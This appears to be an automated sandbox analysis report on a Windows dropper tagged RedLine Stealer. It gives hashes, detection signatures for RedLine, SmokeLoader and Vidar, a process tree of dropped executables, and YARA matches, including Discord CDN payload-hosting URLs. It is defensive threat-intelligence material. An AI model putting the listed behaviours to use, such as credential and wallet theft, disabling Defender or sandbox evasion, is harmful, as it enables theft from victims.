Play interactive tour

Edit tour

Windows Analysis Report 0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe

Overview

General Information

Sample Name:	0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe
Analysis ID:	553373
MD5:	971e01647fbdc05bef3df71b008e2ca6
SHA1:	d8122ee820db5d937056c2f1fd0b7bbf89d8b9c1
SHA256:	0ca57f85e88001edd67dff84428375de282f0f92e5bef2daed1c03ad2fa7612e
Tags:	exeRedLineStealer
Infos:
Most interesting Screenshot:

Detection

RedLine SmartSearch Installer SmokeLoader Vidar onlyLogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected RedLine Stealer

Yara Genericmalware

Yara detected SmokeLoader

Detected unpacking (changes PE section rights)

Antivirus detection for URL or domain

Antivirus detection for dropped file

DLL reload attack detected

Multi AV Scanner detection for submitted file

Yara detected onlyLogger

Antivirus / Scanner detection for submitted sample

Yara detected Vidar stealer

Multi AV Scanner detection for dropped file

Yara detected SmartSearch nstaller

Disable Windows Defender real time protection (registry)

Found stalling execution ending in API Sleep call

PE file has a writeable .text section

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Sigma detected: Suspicious Svchost Process

Found many strings related to Crypto-Wallets (likely being stolen)

PE file contains section with special chars

Yara detected WebBrowserPassView password recovery tool

PE file has nameless sections

Machine Learning detection for dropped file

Antivirus or Machine Learning detection for unpacked file

One or more processes crash

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Contains functionality to dynamically determine API calls

Drops files with a non-matching file extension (content does not match file extension)

PE file contains strange resources

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Binary contains a suspicious time stamp

PE file contains more sections than normal

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Contains functionality to check if a debugger is running (IsDebuggerPresent)

PE file contains sections with non-standard names

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Yara detected Credential Stealer

Found dropped PE file which has not been started or loaded

Contains functionality which may be used to detect a debugger (GetProcessHeap)

PE file contains executable resources (Code or Archives)

Searches for user specific document files

Entry point lies outside standard sections

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

Found inlined nop instructions (likely shell or obfuscated code)

PE file does not import any functions

Sample file is different than original file name gathered from version info

PE file contains an invalid checksum

Connects to several IPs in different countries

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

System is w10x64

0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe (PID: 7156 cmdline: "C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe" MD5: 971E01647FBDC05BEF3DF71B008E2CA6)

setup_install.exe (PID: 5976 cmdline: "C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe" MD5: 774F0D5B7DC3D2AD9CC4A0D921C9DA8B)

conhost.exe (PID: 6004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 6548 cmdline: C:\Windows\system32\cmd.exe /c arnatic_1.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)

arnatic_1.exe (PID: 5768 cmdline: arnatic_1.exe MD5: 6E43430011784CFF369EA5A5AE4B000F)

arnatic_1.exe (PID: 6732 cmdline: "C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_1.exe" -a MD5: 6E43430011784CFF369EA5A5AE4B000F)

conhost.exe (PID: 5348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 4964 cmdline: C:\Windows\system32\cmd.exe /c arnatic_2.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)

arnatic_2.exe (PID: 4784 cmdline: arnatic_2.exe MD5: 68BC76A5DF7A7C5368E8AC9484584825)

explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

cmd.exe (PID: 5868 cmdline: C:\Windows\system32\cmd.exe /c arnatic_3.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)

arnatic_3.exe (PID: 6564 cmdline: arnatic_3.exe MD5: 208EF3505E28717F9227377DA516C109)

WerFault.exe (PID: 4104 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6564 -s 1112 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

cmd.exe (PID: 6576 cmdline: C:\Windows\system32\cmd.exe /c arnatic_4.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)

arnatic_4.exe (PID: 6568 cmdline: arnatic_4.exe MD5: DBC3E1E93FE6F9E1806448CD19E703F7)

cmd.exe (PID: 6592 cmdline: C:\Windows\system32\cmd.exe /c arnatic_5.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)

arnatic_5.exe (PID: 4816 cmdline: arnatic_5.exe MD5: 4A1A271C67B98C9CFC4C6EFA7411B1DD)

4kmOewH8kDodZZ2lCCJUwR4o.exe (PID: 8116 cmdline: "C:\Users\user\Documents\4kmOewH8kDodZZ2lCCJUwR4o.exe" MD5: A9DED7D6470F741B9F4509863665F74C)

WN7mKI9_SQ4ujDwH_kKQHbe7.exe (PID: 8124 cmdline: "C:\Users\user\Documents\WN7mKI9_SQ4ujDwH_kKQHbe7.exe" MD5: 913FC52D517A4B4B2BE78103184EF87E)

l7AR_7u5i2RZzKoKItslndOd.exe (PID: 8132 cmdline: "C:\Users\user\Documents\l7AR_7u5i2RZzKoKItslndOd.exe" MD5: 0162C08D87055722BC49265BD5468D16)

R2IpdvMDW3mqJjP0F3OqthCG.exe (PID: 8140 cmdline: "C:\Users\user\Documents\R2IpdvMDW3mqJjP0F3OqthCG.exe" MD5: 5BF9D56B1B42412A2B169F3FB41B2A4D)

duCdI76Gqz3hAbP72ldEGd_3.exe (PID: 8148 cmdline: "C:\Users\user\Documents\duCdI76Gqz3hAbP72ldEGd_3.exe" MD5: 7A14B5FC36A23C9FF0BAF718FAB093CB)

bCyMoheCXfvXOWdcxUFW1mSl.exe (PID: 8156 cmdline: "C:\Users\user\Documents\bCyMoheCXfvXOWdcxUFW1mSl.exe" MD5: 6BFC3D7F2DE4A00FAC9B4EC72520209F)

cmd.exe (PID: 4020 cmdline: C:\Windows\system32\cmd.exe /c arnatic_6.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)

arnatic_6.exe (PID: 6696 cmdline: arnatic_6.exe MD5: 08E6EA0E270732E402A66E8B54EACFC6)

cmd.exe (PID: 5692 cmdline: C:\Windows\system32\cmd.exe /c arnatic_7.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)

arnatic_7.exe (PID: 6764 cmdline: arnatic_7.exe MD5: 614B53C6D85985DA3A5C895309AC8C16)

WerFault.exe (PID: 6936 cmdline: C:\Windows\system32\WerFault.exe -u -p 6764 -s 1092 MD5: 2AFFE478D86272288BBEF5A00BBEF6A0)

cmd.exe (PID: 5344 cmdline: C:\Windows\system32\cmd.exe /c arnatic_8.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)

arnatic_8.exe (PID: 6776 cmdline: arnatic_8.exe MD5: CFD5BF006F5EFC51046796C64A7CB609)

rundll32.exe (PID: 5804 cmdline: rUNdlL32.eXe "C:\Users\user\AppData\Local\Temp\axhub.dll",main MD5: 73C519F050C20580F8A62C849D49215A)

rundll32.exe (PID: 4140 cmdline: rUNdlL32.eXe "C:\Users\user\AppData\Local\Temp\axhub.dll",main MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

svchost.exe (PID: 2968 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s Appinfo MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 6924 cmdline: C:\Windows\system32\svchost.exe -k SystemNetworkService MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 5924 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 996 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 256 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s IKEEXT MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 2320 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s iphlpsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 2188 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s LanmanServer MD5: 32569E403279B3FD2EDB7EBD036273FA)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_4.txt	SUSP_PE_Discord_Attachment_Oct21_1	Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)	Florian Roth	0x12b1:$x1: https://cdn.discordapp.com/attachments/
C:\Users\user\Documents\RcGzT5XRuDFwXkIj8ZcXjhgH.exe	JoeSecurity_Generic_malware	Yara Generic_malware	Joe Security
C:\Users\user\Documents\RcGzT5XRuDFwXkIj8ZcXjhgH.exe	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\rtst1053[1].exe	JoeSecurity_Generic_malware	Yara Generic_malware	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\rtst1053[1].exe	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000029.00000000.369507854.000001D91AAD0000.00000040.00000001.sdmp	SUSP_XORed_MSDOS_Stub_Message	Detects suspicious XORed MSDOS stub message	Florian Roth	0x6546e:$xo1: \x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
0000002B.00000000.502724798.00000222CAB20000.00000040.00000001.sdmp	SUSP_XORed_MSDOS_Stub_Message	Detects suspicious XORed MSDOS stub message	Florian Roth	0x6546e:$xo1: \x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
00000031.00000002.584879156.0000000002F70000.00000040.00000001.sdmp	JoeSecurity_SmartSearchInstaller	Yara detected SmartSearch nstaller	Joe Security
00000024.00000000.339935983.0000027CA9C70000.00000040.00000001.sdmp	SUSP_XORed_MSDOS_Stub_Message	Detects suspicious XORed MSDOS stub message	Florian Roth	0x6546e:$xo1: \x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
0000002D.00000002.765127683.0000000000580000.00000004.00000001.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0000000F.00000003.304993413.0000000002480000.00000004.00000001.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000021.00000003.550769073.0000024B7D150000.00000004.00000001.sdmp	SUSP_XORed_MSDOS_Stub_Message	Detects suspicious XORed MSDOS stub message	Florian Roth	0x64e6e:$xo1: \x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
0000000F.00000000.325466872.00000000023E0000.00000040.00000001.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0000000F.00000002.424491159.00000000023E0000.00000040.00000001.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0000002F.00000003.469242812.0000000000844000.00000004.00000001.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000021.00000000.323345262.0000024B7D0D0000.00000040.00000001.sdmp	SUSP_XORed_MSDOS_Stub_Message	Detects suspicious XORed MSDOS stub message	Florian Roth	0x6546e:$xo1: \x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
00000029.00000003.567618984.000001D91AB50000.00000004.00000001.sdmp	SUSP_XORed_MSDOS_Stub_Message	Detects suspicious XORed MSDOS stub message	Florian Roth	0x64e6e:$xo1: \x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
0000002D.00000003.443693776.0000000000580000.00000004.00000001.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0000001F.00000002.680954201.0000000002F30000.00000004.00000001.sdmp	SUSP_XORed_MSDOS_Stub_Message	Detects suspicious XORed MSDOS stub message	Florian Roth	0x51f66:$xo1: \x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
0000002B.00000003.416182246.00000222CAAB0000.00000004.00000001.sdmp	SUSP_XORed_MSDOS_Stub_Message	Detects suspicious XORed MSDOS stub message	Florian Roth	0x63e6e:$xo1: \x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
00000021.00000003.322078967.0000024B7D060000.00000004.00000001.sdmp	SUSP_XORed_MSDOS_Stub_Message	Detects suspicious XORed MSDOS stub message	Florian Roth	0x63e6e:$xo1: \x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
0000002A.00000003.572017693.000002F2C5C90000.00000004.00000001.sdmp	SUSP_XORed_MSDOS_Stub_Message	Detects suspicious XORed MSDOS stub message	Florian Roth	0x64e6e:$xo1: \x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000024.00000002.572434076.0000027CA9C70000.00000040.00000001.sdmp	SUSP_XORed_MSDOS_Stub_Message	Detects suspicious XORed MSDOS stub message	Florian Roth	0x6546e:$xo1: \x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
0000000F.00000000.316957711.0000000000400000.00000040.00020000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0000002A.00000003.386722260.000002F2C5B90000.00000004.00000001.sdmp	SUSP_XORed_MSDOS_Stub_Message	Detects suspicious XORed MSDOS stub message	Florian Roth	0x63e6e:$xo1: \x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
00000018.00000003.310217852.0000000000C1F000.00000004.00000001.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000018.00000003.310217852.0000000000C1F000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001F.00000002.686091644.0000000004960000.00000040.00000001.sdmp	SUSP_XORed_MSDOS_Stub_Message	Detects suspicious XORed MSDOS stub message	Florian Roth	0x53d66:$xo1: \x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
0000002E.00000003.451819905.0000000000730000.00000004.00000001.sdmp	JoeSecurity_onlyLogger	Yara detected onlyLogger	Joe Security
0000002D.00000002.765437481.00000000005C1000.00000004.00020000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000029.00000003.365240878.000001D91AA60000.00000004.00000001.sdmp	SUSP_XORed_MSDOS_Stub_Message	Detects suspicious XORed MSDOS stub message	Florian Roth	0x63e6e:$xo1: \x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
0000002A.00000000.397801058.000002F2C5C00000.00000040.00000001.sdmp	SUSP_XORed_MSDOS_Stub_Message	Detects suspicious XORed MSDOS stub message	Florian Roth	0x6546e:$xo1: \x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
00000028.00000003.348602977.0000023342660000.00000004.00000001.sdmp	SUSP_XORed_MSDOS_Stub_Message	Detects suspicious XORed MSDOS stub message	Florian Roth	0x63e6e:$xo1: \x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
00000024.00000003.332963545.0000027CA9C00000.00000004.00000001.sdmp	SUSP_XORed_MSDOS_Stub_Message	Detects suspicious XORed MSDOS stub message	Florian Roth	0x63e6e:$xo1: \x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
00000020.00000000.704126944.0000000002E01000.00000020.00020000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0000000F.00000000.322961935.0000000000400000.00000040.00020000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0000000F.00000000.321122893.00000000023E0000.00000040.00000001.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000028.00000003.561838327.0000023342760000.00000004.00000001.sdmp	SUSP_XORed_MSDOS_Stub_Message	Detects suspicious XORed MSDOS stub message	Florian Roth	0x64e6e:$xo1: \x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
00000028.00000000.350690670.00000233426D0000.00000040.00000001.sdmp	SUSP_XORed_MSDOS_Stub_Message	Detects suspicious XORed MSDOS stub message	Florian Roth	0x6546e:$xo1: \x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
0000002B.00000003.574644922.00000222CB140000.00000004.00000001.sdmp	SUSP_XORed_MSDOS_Stub_Message	Detects suspicious XORed MSDOS stub message	Florian Roth	0x64e6e:$xo1: \x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
Process Memory Space: arnatic_3.exe PID: 6564	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: arnatic_3.exe PID: 6564	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Click to see the 33 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
19.3.arnatic_5.exe.3f90944.32.unpack	SUSP_PE_Discord_Attachment_Oct21_1	Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)	Florian Roth	0x17f2c:$x1: https://cdn.discordapp.com/attachments/ 0x18de4:$x1: https://cdn.discordapp.com/attachments/ 0x1c3bc:$x1: https://cdn.discordapp.com/attachments/ 0x1c9d4:$x1: https://cdn.discordapp.com/attachments/ 0x1ca3c:$x1: https://cdn.discordapp.com/attachments/ 0x1caa4:$x1: https://cdn.discordapp.com/attachments/ 0x1cc44:$x1: https://cdn.discordapp.com/attachments/ 0x1ccac:$x1: https://cdn.discordapp.com/attachments/ 0x1d0bc:$x1: https://cdn.discordapp.com/attachments/
19.3.arnatic_5.exe.3f90944.79.unpack	SUSP_PE_Discord_Attachment_Oct21_1	Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)	Florian Roth	0x17f2c:$x1: https://cdn.discordapp.com/attachments/ 0x18de4:$x1: https://cdn.discordapp.com/attachments/ 0x1c3bc:$x1: https://cdn.discordapp.com/attachments/ 0x1c9d4:$x1: https://cdn.discordapp.com/attachments/ 0x1ca3c:$x1: https://cdn.discordapp.com/attachments/ 0x1caa4:$x1: https://cdn.discordapp.com/attachments/ 0x1cc44:$x1: https://cdn.discordapp.com/attachments/ 0x1ccac:$x1: https://cdn.discordapp.com/attachments/ 0x1d0bc:$x1: https://cdn.discordapp.com/attachments/
17.0.arnatic_4.exe.d30000.0.unpack	SUSP_PE_Discord_Attachment_Oct21_1	Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)	Florian Roth	0x12b1:$x1: https://cdn.discordapp.com/attachments/
19.3.arnatic_5.exe.3f8fd2c.31.unpack	SUSP_PE_Discord_Attachment_Oct21_1	Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)	Florian Roth	0x18144:$x1: https://cdn.discordapp.com/attachments/ 0x18ffc:$x1: https://cdn.discordapp.com/attachments/ 0x1c5d4:$x1: https://cdn.discordapp.com/attachments/ 0x1cbec:$x1: https://cdn.discordapp.com/attachments/ 0x1cc54:$x1: https://cdn.discordapp.com/attachments/ 0x1ccbc:$x1: https://cdn.discordapp.com/attachments/ 0x1ce5c:$x1: https://cdn.discordapp.com/attachments/ 0x1cec4:$x1: https://cdn.discordapp.com/attachments/ 0x1d2d4:$x1: https://cdn.discordapp.com/attachments/
1.3.0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe.240787c.6.raw.unpack	SUSP_PE_Discord_Attachment_Oct21_1	Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)	Florian Roth	0x12b1:$x1: https://cdn.discordapp.com/attachments/
15.0.arnatic_3.exe.23e0e50.2.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
15.0.arnatic_3.exe.400000.3.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
15.0.arnatic_3.exe.400000.1.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
15.2.arnatic_3.exe.23e0e50.1.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
19.3.arnatic_5.exe.64748d0.96.unpack	SUSP_PE_Discord_Attachment_Oct21_1	Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)	Florian Roth	0xb3fd8:$x1: https://cdn.discordapp.com/attachments/ 0xb4158:$x1: https://cdn.discordapp.com/attachments/ 0xb4218:$x1: https://cdn.discordapp.com/attachments/ 0xb42d8:$x1: https://cdn.discordapp.com/attachments/ 0xb4518:$x1: https://cdn.discordapp.com/attachments/ 0xb45d8:$x1: https://cdn.discordapp.com/attachments/ 0xb4698:$x1: https://cdn.discordapp.com/attachments/ 0xb4758:$x1: https://cdn.discordapp.com/attachments/ 0xb4818:$x1: https://cdn.discordapp.com/attachments/ 0xb4998:$x1: https://cdn.discordapp.com/attachments/ 0xb4a58:$x1: https://cdn.discordapp.com/attachments/ 0xb4b18:$x1: https://cdn.discordapp.com/attachments/ 0xb4c98:$x1: https://cdn.discordapp.com/attachments/ 0xb4d58:$x1: https://cdn.discordapp.com/attachments/ 0xb4e18:$x1: https://cdn.discordapp.com/attachments/ 0xb4ed8:$x1: https://cdn.discordapp.com/attachments/ 0xb4f98:$x1: https://cdn.discordapp.com/attachments/ 0xb5058:$x1: https://cdn.discordapp.com/attachments/ 0xb5118:$x1: https://cdn.discordapp.com/attachments/ 0xb51d8:$x1: https://cdn.discordapp.com/attachments/ 0xb5358:$x1: https://cdn.discordapp.com/attachments/
19.3.arnatic_5.exe.3f90944.78.unpack	SUSP_PE_Discord_Attachment_Oct21_1	Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)	Florian Roth	0x17f2c:$x1: https://cdn.discordapp.com/attachments/ 0x18de4:$x1: https://cdn.discordapp.com/attachments/ 0x1c3bc:$x1: https://cdn.discordapp.com/attachments/ 0x1c9d4:$x1: https://cdn.discordapp.com/attachments/ 0x1ca3c:$x1: https://cdn.discordapp.com/attachments/ 0x1caa4:$x1: https://cdn.discordapp.com/attachments/ 0x1cc44:$x1: https://cdn.discordapp.com/attachments/ 0x1ccac:$x1: https://cdn.discordapp.com/attachments/ 0x1d0bc:$x1: https://cdn.discordapp.com/attachments/
15.2.arnatic_3.exe.400000.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
19.3.arnatic_5.exe.64748d0.93.unpack	SUSP_PE_Discord_Attachment_Oct21_1	Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)	Florian Roth	0xb3fd8:$x1: https://cdn.discordapp.com/attachments/ 0xb4158:$x1: https://cdn.discordapp.com/attachments/ 0xb4218:$x1: https://cdn.discordapp.com/attachments/ 0xb42d8:$x1: https://cdn.discordapp.com/attachments/ 0xb4518:$x1: https://cdn.discordapp.com/attachments/ 0xb45d8:$x1: https://cdn.discordapp.com/attachments/ 0xb4698:$x1: https://cdn.discordapp.com/attachments/ 0xb4758:$x1: https://cdn.discordapp.com/attachments/ 0xb4818:$x1: https://cdn.discordapp.com/attachments/ 0xb4998:$x1: https://cdn.discordapp.com/attachments/ 0xb4a58:$x1: https://cdn.discordapp.com/attachments/ 0xb4b18:$x1: https://cdn.discordapp.com/attachments/ 0xb4c98:$x1: https://cdn.discordapp.com/attachments/ 0xb4d58:$x1: https://cdn.discordapp.com/attachments/ 0xb4e18:$x1: https://cdn.discordapp.com/attachments/ 0xb4ed8:$x1: https://cdn.discordapp.com/attachments/ 0xb4f98:$x1: https://cdn.discordapp.com/attachments/ 0xb5058:$x1: https://cdn.discordapp.com/attachments/ 0xb5118:$x1: https://cdn.discordapp.com/attachments/ 0xb51d8:$x1: https://cdn.discordapp.com/attachments/ 0xb5358:$x1: https://cdn.discordapp.com/attachments/
19.3.arnatic_5.exe.3f8fd2c.29.unpack	SUSP_PE_Discord_Attachment_Oct21_1	Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)	Florian Roth	0x18144:$x1: https://cdn.discordapp.com/attachments/ 0x18ffc:$x1: https://cdn.discordapp.com/attachments/ 0x1c5d4:$x1: https://cdn.discordapp.com/attachments/ 0x1cbec:$x1: https://cdn.discordapp.com/attachments/ 0x1cc54:$x1: https://cdn.discordapp.com/attachments/ 0x1ccbc:$x1: https://cdn.discordapp.com/attachments/ 0x1ce5c:$x1: https://cdn.discordapp.com/attachments/ 0x1cec4:$x1: https://cdn.discordapp.com/attachments/ 0x1d2d4:$x1: https://cdn.discordapp.com/attachments/
19.3.arnatic_5.exe.3f8fd2c.77.unpack	SUSP_PE_Discord_Attachment_Oct21_1	Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)	Florian Roth	0x18144:$x1: https://cdn.discordapp.com/attachments/ 0x18ffc:$x1: https://cdn.discordapp.com/attachments/ 0x1c5d4:$x1: https://cdn.discordapp.com/attachments/ 0x1cbec:$x1: https://cdn.discordapp.com/attachments/ 0x1cc54:$x1: https://cdn.discordapp.com/attachments/ 0x1ccbc:$x1: https://cdn.discordapp.com/attachments/ 0x1ce5c:$x1: https://cdn.discordapp.com/attachments/ 0x1cec4:$x1: https://cdn.discordapp.com/attachments/ 0x1d2d4:$x1: https://cdn.discordapp.com/attachments/
19.3.arnatic_5.exe.64748d0.85.unpack	SUSP_PE_Discord_Attachment_Oct21_1	Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)	Florian Roth	0xb3fd8:$x1: https://cdn.discordapp.com/attachments/ 0xb4158:$x1: https://cdn.discordapp.com/attachments/ 0xb4218:$x1: https://cdn.discordapp.com/attachments/ 0xb42d8:$x1: https://cdn.discordapp.com/attachments/ 0xb4518:$x1: https://cdn.discordapp.com/attachments/ 0xb45d8:$x1: https://cdn.discordapp.com/attachments/ 0xb4698:$x1: https://cdn.discordapp.com/attachments/ 0xb4758:$x1: https://cdn.discordapp.com/attachments/ 0xb4818:$x1: https://cdn.discordapp.com/attachments/ 0xb4998:$x1: https://cdn.discordapp.com/attachments/ 0xb4a58:$x1: https://cdn.discordapp.com/attachments/ 0xb4b18:$x1: https://cdn.discordapp.com/attachments/ 0xb4c98:$x1: https://cdn.discordapp.com/attachments/ 0xb4d58:$x1: https://cdn.discordapp.com/attachments/ 0xb4e18:$x1: https://cdn.discordapp.com/attachments/ 0xb4ed8:$x1: https://cdn.discordapp.com/attachments/ 0xb4f98:$x1: https://cdn.discordapp.com/attachments/ 0xb5058:$x1: https://cdn.discordapp.com/attachments/ 0xb5118:$x1: https://cdn.discordapp.com/attachments/ 0xb51d8:$x1: https://cdn.discordapp.com/attachments/ 0xb5358:$x1: https://cdn.discordapp.com/attachments/
19.3.arnatic_5.exe.64748d0.84.unpack	SUSP_PE_Discord_Attachment_Oct21_1	Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN)	Florian Roth	0xb3fd8:$x1: https://cdn.discordapp.com/attachments/ 0xb4158:$x1: https://cdn.discordapp.com/attachments/ 0xb4218:$x1: https://cdn.discordapp.com/attachments/ 0xb42d8:$x1: https://cdn.discordapp.com/attachments/ 0xb4518:$x1: https://cdn.discordapp.com/attachments/ 0xb45d8:$x1: https://cdn.discordapp.com/attachments/ 0xb4698:$x1: https://cdn.discordapp.com/attachments/ 0xb4758:$x1: https://cdn.discordapp.com/attachments/ 0xb4818:$x1: https://cdn.discordapp.com/attachments/ 0xb4998:$x1: https://cdn.discordapp.com/attachments/ 0xb4a58:$x1: https://cdn.discordapp.com/attachments/ 0xb4b18:$x1: https://cdn.discordapp.com/attachments/ 0xb4c98:$x1: https://cdn.discordapp.com/attachments/ 0xb4d58:$x1: https://cdn.discordapp.com/attachments/ 0xb4e18:$x1: https://cdn.discordapp.com/attachments/ 0xb4ed8:$x1: https://cdn.discordapp.com/attachments/ 0xb4f98:$x1: https://cdn.discordapp.com/attachments/ 0xb5058:$x1: https://cdn.discordapp.com/attachments/ 0xb5118:$x1: https://cdn.discordapp.com/attachments/ 0xb51d8:$x1: https://cdn.discordapp.com/attachments/ 0xb5358:$x1: https://cdn.discordapp.com/attachments/
15.3.arnatic_3.exe.2480000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
15.3.arnatic_3.exe.2480000.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
